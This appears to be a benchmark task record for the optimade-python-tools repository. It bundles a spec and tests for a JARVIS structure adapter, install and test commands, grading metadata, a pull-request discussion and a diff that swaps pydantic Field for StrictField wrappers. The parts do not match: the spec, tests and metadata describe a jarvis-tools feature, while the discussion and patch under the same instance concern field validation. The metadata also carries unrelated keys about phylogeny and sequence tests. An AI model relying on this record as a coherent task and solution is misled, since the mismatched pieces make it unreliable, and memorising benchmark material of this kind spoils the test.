["ase"], "numpy": ["cif", "pdb", "pdbx_mmcif"], "pymatgen": ["pymatgen"], + "jarvis": ["jarvis"], } modules_to_test = [] - for module in ("aiida", "ase", "numpy", "pymatgen"): + for module in ("aiida", "ase", "numpy", "pymatgen", "jarvis"): try: importlib.import_module(module) except (ImportError, ModuleNotFoundError):
[ "tests/adapters/structures/test_structures.py::TestStructure::test_instantiate", "tests/adapters/structures/test_structures.py::TestStructure::test_setting_entry", "tests/adapters/structures/test_structures.py::TestStructure::test_convert", "tests/adapters/structures/test_structures.py::TestStructure::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::TestStructure::test_getattr_order", "tests/adapters/structures/test_structures.py::TestStructure::test_no_module_conversion", "tests/adapters/structures/test_structures.py::TestStructure::test_common_converters" ]
[]
Function: get_jarvis_atoms(optimade_structure: OptimadeStructure) -> Atoms Location: optimade.adapters.structures.jarvis.get_jarvis_atoms Inputs: - **optimade_structure**: An instance of `optimade.models.StructureResource` (or any object exposing the same attribute layout) representing an OPTIMADE structure. The object must provide `attributes` containing `lattice_vectors`, `species`, `cartesian_site_positions`, and `structure_features`. Outputs: - Returns a `jarvis.core.atoms.Atoms` instance constructed from the supplied OPTIMADE structure data. - Returns `None` (with a warning) if the `jarvis-tools` package is not installed. Description: Converts a valid OPTIMADE `StructureResource` into a `jarvis.core.atoms.Atoms` object. The conversion pads missing site positions, rejects structures that contain partial occupancies (raising `ConversionError`), and maps lattice vectors, element symbols, and Cartesian coordinates to the JARVIS `Atoms` representation.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/structures/test_jarvis.py tests/adapters/structures/test_structures.py" }
{ "num_modified_files": 3, "num_modified_lines": 56, "pr_author": "knc6", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/usnistgov/jarvis" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests support for jarvis‑tools structures. The added tests verify that a get_jarvis_atoms adapter correctly converts OPTIMADE structures, handles null positions/lattice vectors, special species, and raises an error for partial occupancies. The implementation in the golden patch directly satisfies these test expectations, and the tests do not introduce unrelated requirements, so the task is solvable without environment‑preparation problems.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
06dd2be63200ad094a8926a488f26ae7f0609c93
2020-08-05 14:43:13
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=h1) Report > Merging [#453](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e965bc8051b776c88ca93f3ff4d5a48ea99b88ef&el=desc) will **not change** coverage. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #453 +/- ## ======================================= Coverage 91.26% 91.26% ======================================= Files 60 60 Lines 2815 2815 ======================================= Hits 2569 2569 Misses 246 246 ``` | Flag | Coverage Δ | | |---|---|---| | #unittests | `91.26% <100.00%> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/models/structures.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453/diff?src=pr&el=tree#diff-b3B0aW1hZGUvbW9kZWxzL3N0cnVjdHVyZXMucHk=) | `95.62% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=footer). Last update [e965bc8...8b00825](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/453?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). CasperWA: > Following the discussion in #399, this PR is a place to try out ways of incorporating the "SHOULD" level of support for some fields in the specification. This PR does the following: > > * adds a couple of wrappers around pydantic's `Field` (namely `OptimadeField` and `StrictField`). > > * `StrictField` disallows keys outside of the pydantic `Field` signature, plus a couple of extras that we use (`unit`, `pattern` and `uniqueItems`), unfortunately. It emits a warning if a description is not supplied. Any tips on how to do this in a more pydantic way would be appreciated... > * `OptimadeField` calls `StrictField` but also forces all fields to supply a `queryable` and a `support` attribute for all fields > > * switch away from `pattern=...` to `regex=...` inside `Field(...)` where possible so that regexes are applied automatically on validation. Some of these were done on purpose, since we were either already testing this, or I found that the additional validation was time-consuming and irrelevant. The latter may be the case for the fields with constant values... ml-evs: > I am not sure why you're getting the issues concerning the tests and `re' matching. But I've provided a suggested change for you to try out :) +1 > I wonder if we can do this in Config of a parent model instead, but perhaps not. Perhaps this is the best way. It's at least quite elegant in the end, I think. At least for what it is. Yeah, I think the only other option is to define OptimadeModel(BaseModel) and StrictModel(BaseModel), but I think that would involve a fair bit more hackery. > Otherwise we should create a custom JSON encoder that can do all this and be used when creating the OpenAPI specification? Yep, I think we have no other choice if we want this stuff in the schema. ml-evs: > > ``` > > * switch away from `pattern=...` to `regex=...` inside `Field(...)` where possible so that regexes are applied automatically on validation. > > ``` > > Some of these were done on purpose, since we were either already testing this, or I found that the additional validation was time-consuming and irrelevant. The latter may be the case for the fields with constant values... I only changed them because I didn't like that I had to allow `pattern` through `StrictField` as a special case, but then I couldn't get rid of it for the URL regex anyway. I guess you're right, it is redundant for the const case (I doubt it even runs the regex?) Happy to revert this one if you want. CasperWA: > > > ``` > > > * switch away from `pattern=...` to `regex=...` inside `Field(...)` where possible so that regexes are applied automatically on validation. > > > ``` > > > > > > Some of these were done on purpose, since we were either already testing this, or I found that the additional validation was time-consuming and irrelevant. The latter may be the case for the fields with constant values... > > I only changed them because I didn't like that I had to allow `pattern` through `StrictField` as a special case, but then I couldn't get rid of it for the URL regex anyway. I guess you're right, it is redundant for the const case (I doubt it even runs the regex?) Happy to revert this one if you want. I'm pretty sure the `const` value is simply set at some point and the validation is then run. So for these values I'd rather just revert to not uneccesarily clutter the list of validators. It's a form of an OpenAPI schema hack already as it is ;) And indeed, `pattern` is added as a result of the `regex`, but `regex` also adds a validator. ml-evs: > I'm pretty sure the `const` value is simply set at some point and the validation is then run. So for these values I'd rather just revert to not uneccesarily clutter the list of validators. It's a form of an OpenAPI schema hack already as it is ;) Yep, fair, reverted. ml-evs: Have squashed this down to 3 commits, so ready when you are happy with it @CasperWA. ml-evs: Annoyingly GH was hiding some remaining unresolved comments, so feel free to disagree with me on those still...
materials-consortia__optimade-python-tools-453
diff --git a/openapi/openapi.json b/openapi/openapi.json index cb4f49c6..8a315390 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -2116,7 +2116,8 @@ "properties": { "name": { "title": "Name", - "type": "string" + "type": "string", + "description": "Full name of the person, REQUIRED." }, "firstname": { "title": "Firstname", @@ -2128,7 +2129,8 @@ "type": "string", "description": "Last name of the person." } - } + }, + "description": "A person, i.e., an author, editor or other." }, "Provider": { "title": "Provider", @@ -2836,7 +2838,8 @@ "properties": { "name": { "title": "Name", - "type": "string" + "type": "string", + "description": "Gives the name of the species; the **name** value MUST be unique in the `species` list." }, "chemical_symbols": { "title": "Chemical Symbols", diff --git a/optimade/models/baseinfo.py b/optimade/models/baseinfo.py index 78796084..71d013d8 100644 --- a/optimade/models/baseinfo.py +++ b/optimade/models/baseinfo.py @@ -5,7 +5,7 @@ from typing import Dict, List, Optional from pydantic import BaseModel, AnyHttpUrl, Field, validator, root_validator from optimade.models.jsonapi import Resource -from optimade.models.utils import SemanticVersion +from optimade.models.utils import SemanticVersion, StrictField __all__ = ("AvailableApiVersion", "BaseInfoAttributes", "BaseInfoResource") @@ -14,13 +14,13 @@ __all__ = ("AvailableApiVersion", "BaseInfoAttributes", "BaseInfoResource") class AvailableApiVersion(BaseModel): """A JSON object containing information about an available API version""" - url: AnyHttpUrl = Field( + url: AnyHttpUrl = StrictField( ..., description="A string specifying a versioned base URL that MUST adhere to the rules in section Base URL", pattern=r".+/v[0-1](\.[0-9]+)*/?$", ) - version: SemanticVersion = Field( + version: SemanticVersion = StrictField( ..., description="""A string containing the full version number of the API served at that versioned base URL. The version number string MUST NOT be prefixed by, e.g., 'v'. @@ -59,27 +59,27 @@ Examples: `1.0.0`, `1.0.0-rc.2`.""", class BaseInfoAttributes(BaseModel): """Attributes for Base URL Info endpoint""" - api_version: SemanticVersion = Field( + api_version: SemanticVersion = StrictField( ..., description="""Presently used full version of the OPTIMADE API. The version number string MUST NOT be prefixed by, e.g., "v". Examples: `1.0.0`, `1.0.0-rc.2`.""", ) - available_api_versions: List[AvailableApiVersion] = Field( + available_api_versions: List[AvailableApiVersion] = StrictField( ..., description="A list of dictionaries of available API versions at other base URLs", ) - formats: List[str] = Field( + formats: List[str] = StrictField( default=["json"], description="List of available output formats." ) - available_endpoints: List[str] = Field( + available_endpoints: List[str] = StrictField( ..., description="List of available endpoints (i.e., the string to be appended to the versioned base URL).", ) - entry_types_by_format: Dict[str, List[str]] = Field( + entry_types_by_format: Dict[str, List[str]] = StrictField( ..., description="Available entry endpoints as a function of output formats." ) - is_index: Optional[bool] = Field( + is_index: Optional[bool] = StrictField( default=False, description="If true, this is an index meta-database base URL (see section Index Meta-Database). " "If this member is not provided, the client MUST assume this is not an index meta-database base URL " diff --git a/optimade/models/entries.py b/optimade/models/entries.py index a0f16769..9a74189a 100644 --- a/optimade/models/entries.py +++ b/optimade/models/entries.py @@ -5,6 +5,7 @@ from pydantic import BaseModel, Field, validator # pylint: disable=no-name-in-m from optimade.models.jsonapi import Relationships, Attributes, Resource from optimade.models.optimade_json import Relationship, DataType +from optimade.models.utils import StrictField, OptimadeField, SupportLevel __all__ = ( @@ -42,12 +43,12 @@ class StructureRelationship(TypedRelationship): class EntryRelationships(Relationships): """This model wraps the JSON API Relationships to include type-specific top level keys. """ - references: Optional[ReferenceRelationship] = Field( + references: Optional[ReferenceRelationship] = StrictField( None, description="Object containing links to relationships with entries of the `references` type.", ) - structures: Optional[StructureRelationship] = Field( + structures: Optional[StructureRelationship] = StrictField( None, description="Object containing links to relationships with entries of the `structures` type.", ) @@ -56,7 +57,7 @@ class EntryRelationships(Relationships): class EntryResourceAttributes(Attributes): """Contains key-value pairs representing the entry's properties.""" - immutable_id: Optional[str] = Field( + immutable_id: Optional[str] = OptimadeField( None, description="""The entry's immutable ID (e.g., an UUID). This is important for databases having preferred IDs that point to "the latest version" of a record, but still offer access to older variants. This ID maps to the version-specific record, in case it changes in the future. @@ -69,9 +70,11 @@ class EntryResourceAttributes(Attributes): - **Examples**: - `"8bd3e750-b477-41a0-9b11-3a799f21b44f"` - `"fjeiwoj,54;@=%<>#32"` (Strings that are not URL-safe are allowed.)""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.MUST, ) - last_modified: datetime = Field( + last_modified: datetime = OptimadeField( ..., description="""Date and time representing when the entry was last modified. @@ -84,13 +87,15 @@ class EntryResourceAttributes(Attributes): - **Example**: - As part of JSON response format: `"2007-04-05T14:30:20Z"` (i.e., encoded as an [RFC 3339 Internet Date/Time Format](https://tools.ietf.org/html/rfc3339#section-5.6) string.)""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) class EntryResource(Resource): """The base model for an entry resource.""" - id: str = Field( + id: str = OptimadeField( ..., description="""An entry's ID as defined in section Definition of Terms. @@ -107,6 +112,8 @@ class EntryResource(Resource): - `"cod/2000000@1234567"` - `"nomad/L1234567890"` - `"42"`""", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) type: str = Field( @@ -122,15 +129,17 @@ class EntryResource(Resource): - The entry of type `<type>` and ID `<id>` MUST be returned in response to a request for `/<type>/<id>` under the versioned base URL. - **Example**: `"structures"`""", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) - attributes: EntryResourceAttributes = Field( + attributes: EntryResourceAttributes = StrictField( ..., description="""A dictionary, containing key-value pairs representing the entry's properties, except for `type` and `id`. Database-provider-specific properties need to include the database-provider-specific prefix (see section on Database-Provider-Specific Namespace Prefixes).""", ) - relationships: Optional[EntryRelationships] = Field( + relationships: Optional[EntryRelationships] = StrictField( None, description="""A dictionary containing references to other entries according to the description in section Relationships encoded as [JSON API Relationships](https://jsonapi.org/format/1.0/#document-resource-object-relationships). The OPTIONAL human-readable description of the relationship MAY be provided in the `description` field inside the `meta` dictionary of the JSON API resource identifier object.""", @@ -139,24 +148,24 @@ The OPTIONAL human-readable description of the relationship MAY be provided in t class EntryInfoProperty(BaseModel): - description: str = Field( + description: str = StrictField( ..., description="A human-readable description of the entry property" ) - unit: Optional[str] = Field( + unit: Optional[str] = StrictField( None, description="""The physical unit of the entry property. This MUST be a valid representation of units according to version 2.1 of [The Unified Code for Units of Measure](https://unitsofmeasure.org/ucum.html). It is RECOMMENDED that non-standard (non-SI) units are described in the description for the property.""", ) - sortable: Optional[bool] = Field( + sortable: Optional[bool] = StrictField( None, description="""Defines whether the entry property can be used for sorting with the "sort" parameter. If the entry listing endpoint supports sorting, this key MUST be present for sortable properties with value `true`.""", ) - type: Optional[DataType] = Field( + type: Optional[DataType] = StrictField( None, description="""The type of the property's value. This MUST be any of the types defined in the Data types section. @@ -168,18 +177,18 @@ E.g., for the entry resource `structures`, the `species` property is defined as class EntryInfoResource(BaseModel): - formats: List[str] = Field( + formats: List[str] = StrictField( ..., description="List of output formats available for this type of entry." ) - description: str = Field(..., description="Description of the entry.") + description: str = StrictField(..., description="Description of the entry.") - properties: Dict[str, EntryInfoProperty] = Field( + properties: Dict[str, EntryInfoProperty] = StrictField( ..., description="A dictionary describing queryable properties for this entry type, where each key is a property name.", ) - output_fields_by_format: Dict[str, List[str]] = Field( + output_fields_by_format: Dict[str, List[str]] = StrictField( ..., description="Dictionary of available output fields for this entry type, where the keys are the values of the `formats` list and the values are the keys of the `properties` dictionary.", ) diff --git a/optimade/models/index_metadb.py b/optimade/models/index_metadb.py index de8e7672..c84f866b 100644 --- a/optimade/models/index_metadb.py +++ b/optimade/models/index_metadb.py @@ -6,6 +6,7 @@ from typing import Union, Dict from optimade.models.jsonapi import BaseResource from optimade.models.baseinfo import BaseInfoAttributes, BaseInfoResource +from optimade.models.utils import StrictField __all__ = ( @@ -25,7 +26,7 @@ class DefaultRelationship(Enum): class IndexInfoAttributes(BaseInfoAttributes): """Attributes for Base URL Info endpoint for an Index Meta-Database""" - is_index: bool = Field( + is_index: bool = StrictField( True, const=True, description="This must be `true` since this is an index meta-database (see section Index Meta-Database).", @@ -35,13 +36,13 @@ class IndexInfoAttributes(BaseInfoAttributes): class RelatedLinksResource(BaseResource): """A related Links resource object""" - type: str = Field("links", const="links", pattern="^links$") + type: str = Field("links", const="links", regex="^links$") class IndexRelationship(BaseModel): """Index Meta-Database relationship""" - data: Union[None, RelatedLinksResource] = Field( + data: Union[None, RelatedLinksResource] = StrictField( ..., description="""[JSON API resource linkage](http://jsonapi.org/format/1.0/#document-links). It MUST be either `null` or contain a single Links identifier object with the fields `id` and `type`""", @@ -52,7 +53,9 @@ class IndexInfoResource(BaseInfoResource): """Index Meta-Database Base URL Info endpoint resource""" attributes: IndexInfoAttributes = Field(...) - relationships: Union[None, Dict[DefaultRelationship, IndexRelationship]] = Field( + relationships: Union[ + None, Dict[DefaultRelationship, IndexRelationship] + ] = StrictField( ..., description="""Reference to the Links identifier object under the `links` endpoint that the provider has chosen as their 'default' OPTIMADE API database. A client SHOULD present this database as the first choice when an end-user chooses this provider.""", diff --git a/optimade/models/jsonapi.py b/optimade/models/jsonapi.py index 34bf1e4e..910fc8ed 100644 --- a/optimade/models/jsonapi.py +++ b/optimade/models/jsonapi.py @@ -5,10 +5,10 @@ from datetime import datetime, timezone from pydantic import ( # pylint: disable=no-name-in-module BaseModel, AnyUrl, - Field, parse_obj_as, root_validator, ) +from optimade.models.utils import StrictField __all__ = ( @@ -39,8 +39,8 @@ class Meta(BaseModel): class Link(BaseModel): """A link **MUST** be represented as either: a string containing the link's URL or a link object.""" - href: AnyUrl = Field(..., description="a string containing the link’s URL.") - meta: Optional[Meta] = Field( + href: AnyUrl = StrictField(..., description="a string containing the link’s URL.") + meta: Optional[Meta] = StrictField( None, description="a meta object containing non-standard meta-information about the link.", ) @@ -49,29 +49,35 @@ class Link(BaseModel): class JsonApi(BaseModel): """An object describing the server's implementation""" - version: str = Field(default="1.0", description="Version of the json API used") - meta: Optional[Meta] = Field(None, description="Non-standard meta information") + version: str = StrictField( + default="1.0", description="Version of the json API used" + ) + meta: Optional[Meta] = StrictField( + None, description="Non-standard meta information" + ) class ToplevelLinks(BaseModel): """A set of Links objects, possibly including pagination""" - self: Optional[Union[AnyUrl, Link]] = Field(None, description="A link to itself") - related: Optional[Union[AnyUrl, Link]] = Field( + self: Optional[Union[AnyUrl, Link]] = StrictField( + None, description="A link to itself" + ) + related: Optional[Union[AnyUrl, Link]] = StrictField( None, description="A related resource link" ) # Pagination - first: Optional[Union[AnyUrl, Link]] = Field( + first: Optional[Union[AnyUrl, Link]] = StrictField( None, description="The first page of data" ) - last: Optional[Union[AnyUrl, Link]] = Field( + last: Optional[Union[AnyUrl, Link]] = StrictField( None, description="The last page of data" ) - prev: Optional[Union[AnyUrl, Link]] = Field( + prev: Optional[Union[AnyUrl, Link]] = StrictField( None, description="The previous page of data" ) - next: Optional[Union[AnyUrl, Link]] = Field( + next: Optional[Union[AnyUrl, Link]] = StrictField( None, description="The next page of data" ) @@ -94,7 +100,7 @@ class ToplevelLinks(BaseModel): class ErrorLinks(BaseModel): """A Links object specific to Error objects""" - about: Optional[Union[AnyUrl, Link]] = Field( + about: Optional[Union[AnyUrl, Link]] = StrictField( None, description="A link that leads to further details about this particular occurrence of the problem.", ) @@ -103,12 +109,12 @@ class ErrorLinks(BaseModel): class ErrorSource(BaseModel): """an object containing references to the source of the error""" - pointer: Optional[str] = Field( + pointer: Optional[str] = StrictField( None, description="a JSON Pointer [RFC6901] to the associated entity in the request document " '[e.g. "/data" for a primary data object, or "/data/attributes/title" for a specific attribute].', ) - parameter: Optional[str] = Field( + parameter: Optional[str] = StrictField( None, description="a string indicating which URI query parameter caused the error.", ) @@ -117,34 +123,34 @@ class ErrorSource(BaseModel): class Error(BaseModel): """An error response""" - id: Optional[str] = Field( + id: Optional[str] = StrictField( None, description="A unique identifier for this particular occurrence of the problem.", ) - links: Optional[ErrorLinks] = Field( + links: Optional[ErrorLinks] = StrictField( None, description="A links object storing about" ) - status: Optional[str] = Field( + status: Optional[str] = StrictField( None, description="the HTTP status code applicable to this problem, expressed as a string value.", ) - code: Optional[str] = Field( + code: Optional[str] = StrictField( None, description="an application-specific error code, expressed as a string value.", ) - title: Optional[str] = Field( + title: Optional[str] = StrictField( None, description="A short, human-readable summary of the problem. " "It **SHOULD NOT** change from occurrence to occurrence of the problem, except for purposes of localization.", ) - detail: Optional[str] = Field( + detail: Optional[str] = StrictField( None, description="A human-readable explanation specific to this occurrence of the problem.", ) - source: Optional[ErrorSource] = Field( + source: Optional[ErrorSource] = StrictField( None, description="An object containing references to the source of the error" ) - meta: Optional[Meta] = Field( + meta: Optional[Meta] = StrictField( None, description="a meta object containing non-standard meta-information about the error.", ) @@ -156,8 +162,8 @@ class Error(BaseModel): class BaseResource(BaseModel): """Minimum requirements to represent a Resource""" - id: str = Field(..., description="Resource ID") - type: str = Field(..., description="Resource type") + id: str = StrictField(..., description="Resource ID") + type: str = StrictField(..., description="Resource type") class Config: @staticmethod @@ -189,14 +195,14 @@ class RelationshipLinks(BaseModel): """ - self: Optional[Union[AnyUrl, Link]] = Field( + self: Optional[Union[AnyUrl, Link]] = StrictField( None, description="""A link for the relationship itself (a 'relationship link'). This link allows the client to directly manipulate the relationship. When fetched successfully, this link returns the [linkage](https://jsonapi.org/format/1.0/#document-resource-object-linkage) for the related resources as its primary data. (See [Fetching Relationships](https://jsonapi.org/format/1.0/#fetching-relationships).)""", ) - related: Optional[Union[AnyUrl, Link]] = Field( + related: Optional[Union[AnyUrl, Link]] = StrictField( None, description="A [related resource link](https://jsonapi.org/format/1.0/#document-resource-object-related-resource-links).", ) @@ -216,14 +222,14 @@ When fetched successfully, this link returns the [linkage](https://jsonapi.org/f class Relationship(BaseModel): """Representation references from the resource object in which it’s defined to other resource objects.""" - links: Optional[RelationshipLinks] = Field( + links: Optional[RelationshipLinks] = StrictField( None, description="a links object containing at least one of the following: self, related", ) - data: Optional[Union[BaseResource, List[BaseResource]]] = Field( - None, description="Resource linkage", uniqueItems=True + data: Optional[Union[BaseResource, List[BaseResource]]] = StrictField( + None, description="Resource linkage" ) - meta: Optional[Meta] = Field( + meta: Optional[Meta] = StrictField( None, description="a meta object that contains non-standard meta-information about the relationship.", ) @@ -262,7 +268,7 @@ class Relationships(BaseModel): class ResourceLinks(BaseModel): """A Resource Links object""" - self: Optional[Union[AnyUrl, Link]] = Field( + self: Optional[Union[AnyUrl, Link]] = StrictField( None, description="A link that identifies the resource represented by the resource object.", ) @@ -295,18 +301,18 @@ class Attributes(BaseModel): class Resource(BaseResource): """Resource objects appear in a JSON API document to represent resources.""" - links: Optional[ResourceLinks] = Field( + links: Optional[ResourceLinks] = StrictField( None, description="a links object containing links related to the resource." ) - meta: Optional[Meta] = Field( + meta: Optional[Meta] = StrictField( None, description="a meta object containing non-standard meta-information about a resource that can not be represented as an attribute or relationship.", ) - attributes: Optional[Attributes] = Field( + attributes: Optional[Attributes] = StrictField( None, description="an attributes object representing some of the resource’s data.", ) - relationships: Optional[Relationships] = Field( + relationships: Optional[Relationships] = StrictField( None, description="""[Relationships object](https://jsonapi.org/format/1.0/#document-resource-object-relationships) describing relationships between the resource and other JSON API resources.""", @@ -316,23 +322,23 @@ describing relationships between the resource and other JSON API resources.""", class Response(BaseModel): """A top-level response""" - data: Optional[Union[None, Resource, List[Resource]]] = Field( + data: Optional[Union[None, Resource, List[Resource]]] = StrictField( None, description="Outputted Data", uniqueItems=True ) - meta: Optional[Meta] = Field( + meta: Optional[Meta] = StrictField( None, description="A meta object containing non-standard information related to the Success", ) - errors: Optional[List[Error]] = Field( + errors: Optional[List[Error]] = StrictField( None, description="A list of unique errors", uniqueItems=True ) - included: Optional[List[Resource]] = Field( + included: Optional[List[Resource]] = StrictField( None, description="A list of unique included resources", uniqueItems=True ) - links: Optional[ToplevelLinks] = Field( + links: Optional[ToplevelLinks] = StrictField( None, description="Links associated with the primary data or errors" ) - jsonapi: Optional[JsonApi] = Field( + jsonapi: Optional[JsonApi] = StrictField( None, description="Information about the JSON API used" ) diff --git a/optimade/models/links.py b/optimade/models/links.py index c6e6c57a..4598435a 100644 --- a/optimade/models/links.py +++ b/optimade/models/links.py @@ -2,7 +2,6 @@ from enum import Enum from pydantic import ( # pylint: disable=no-name-in-module - Field, AnyUrl, root_validator, ) @@ -10,6 +9,7 @@ from typing import Union, Optional from optimade.models.jsonapi import Link, Attributes from optimade.models.entries import EntryResource +from optimade.models.utils import StrictField __all__ = ( @@ -39,31 +39,31 @@ class Aggregate(Enum): class LinksResourceAttributes(Attributes): """Links endpoint resource object attributes""" - name: str = Field( + name: str = StrictField( ..., description="Human-readable name for the OPTIMADE API implementation, e.g., for use in clients to show the name to the end-user.", ) - description: str = Field( + description: str = StrictField( ..., description="Human-readable description for the OPTIMADE API implementation, e.g., for use in clients to show a description to the end-user.", ) - base_url: Optional[Union[AnyUrl, Link]] = Field( + base_url: Optional[Union[AnyUrl, Link]] = StrictField( ..., description="JSON API links object, pointing to the base URL for this implementation", ) - homepage: Optional[Union[AnyUrl, Link]] = Field( + homepage: Optional[Union[AnyUrl, Link]] = StrictField( ..., description="JSON API links object, pointing to a homepage URL for this implementation", ) - link_type: LinkType = Field( + link_type: LinkType = StrictField( ..., description="""The type of the linked relation. MUST be one of these values: 'child', 'root', 'external', 'providers'.""", ) - aggregate: Optional[Aggregate] = Field( + aggregate: Optional[Aggregate] = StrictField( "ok", description="""A string indicating whether a client that is following links to aggregate results from different OPTIMADE implementations should follow this link or not. This flag SHOULD NOT be indicated for links where `link_type` is not `child`. @@ -77,7 +77,7 @@ A client MAY follow the link anyway if it has reason to do so (e.g., if the clie If specified, it MUST be one of the values listed in section Link Aggregate Options.""", ) - no_aggregate_reason: Optional[str] = Field( + no_aggregate_reason: Optional[str] = StrictField( None, description="""An OPTIONAL human-readable string indicating the reason for suggesting not to aggregate results following the link. It SHOULD NOT be present if `aggregate`=`ok`.""", @@ -87,14 +87,14 @@ It SHOULD NOT be present if `aggregate`=`ok`.""", class LinksResource(EntryResource): """A Links endpoint resource object""" - type: str = Field( + type: str = StrictField( "links", const="links", description="These objects are described in detail in the section Links Endpoint", pattern="^links$", ) - attributes: LinksResourceAttributes = Field( + attributes: LinksResourceAttributes = StrictField( ..., description="A dictionary containing key-value pairs representing the Links resource's properties.", ) diff --git a/optimade/models/optimade_json.py b/optimade/models/optimade_json.py index 07ad1840..75372afd 100644 --- a/optimade/models/optimade_json.py +++ b/optimade/models/optimade_json.py @@ -2,13 +2,13 @@ # pylint: disable=no-self-argument,no-name-in-module from enum import Enum -from pydantic import Field, root_validator, BaseModel, AnyHttpUrl, AnyUrl, EmailStr +from pydantic import root_validator, BaseModel, AnyHttpUrl, AnyUrl, EmailStr from typing import Optional, Union, List, Dict, Type, Any from datetime import datetime from optimade.models import jsonapi -from optimade.models.utils import SemanticVersion +from optimade.models.utils import SemanticVersion, StrictField __all__ = ( @@ -126,7 +126,7 @@ class DataType(Enum): class OptimadeError(jsonapi.Error): """detail MUST be present""" - detail: str = Field( + detail: str = StrictField( ..., description="A human-readable explanation specific to this occurrence of the problem.", ) @@ -144,7 +144,7 @@ class Warnings(OptimadeError): """ - type: str = Field( + type: str = StrictField( "warning", const="warning", description='Warnings must be of type "warning"', @@ -182,7 +182,7 @@ class Warnings(OptimadeError): class ResponseMetaQuery(BaseModel): """ Information on the query that was requested. """ - representation: str = Field( + representation: str = StrictField( ..., description="""A string with the part of the URL following the versioned or unversioned base URL that serves the API. Query parameters that have not been used in processing the request MAY be omitted. @@ -194,18 +194,18 @@ Example: `/structures?filter=nelements=2`""", class Provider(BaseModel): """Information on the database provider of the implementation.""" - name: str = Field(..., description="a short name for the database provider") + name: str = StrictField(..., description="a short name for the database provider") - description: str = Field( + description: str = StrictField( ..., description="a longer description of the database provider" ) - prefix: str = Field( + prefix: str = StrictField( ..., description="database-provider-specific prefix as found in section Database-Provider-Specific Namespace Prefixes.", ) - homepage: Optional[Union[AnyHttpUrl, jsonapi.Link]] = Field( + homepage: Optional[Union[AnyHttpUrl, jsonapi.Link]] = StrictField( None, description="a [JSON API links object](http://jsonapi.org/format/1.0#document-links) " "pointing to homepage of the database provider, either " @@ -216,29 +216,29 @@ class Provider(BaseModel): class ImplementationMaintainer(BaseModel): """Details about the maintainer of the implementation""" - email: EmailStr = Field(..., description="the maintainer's email address") + email: EmailStr = StrictField(..., description="the maintainer's email address") class Implementation(BaseModel): """Information on the server implementation""" - name: Optional[str] = Field(None, description="name of the implementation") + name: Optional[str] = StrictField(None, description="name of the implementation") - version: Optional[str] = Field( + version: Optional[str] = StrictField( None, description="version string of the current implementation" ) - homepage: Optional[Union[AnyHttpUrl, jsonapi.Link]] = Field( + homepage: Optional[Union[AnyHttpUrl, jsonapi.Link]] = StrictField( None, description="A [JSON API links object](http://jsonapi.org/format/1.0/#document-links) pointing to the homepage of the implementation.", ) - source_url: Optional[Union[AnyUrl, jsonapi.Link]] = Field( + source_url: Optional[Union[AnyUrl, jsonapi.Link]] = StrictField( None, description="A [JSON API links object](http://jsonapi.org/format/1.0/#document-links) pointing to the implementation source, either downloadable archive or version control system.", ) - maintainer: Optional[ImplementationMaintainer] = Field( + maintainer: Optional[ImplementationMaintainer] = StrictField( None, description="A dictionary providing details about the maintainer of the implementation.", ) @@ -255,24 +255,24 @@ class ResponseMeta(jsonapi.Meta): database-provider-specific prefix. """ - query: 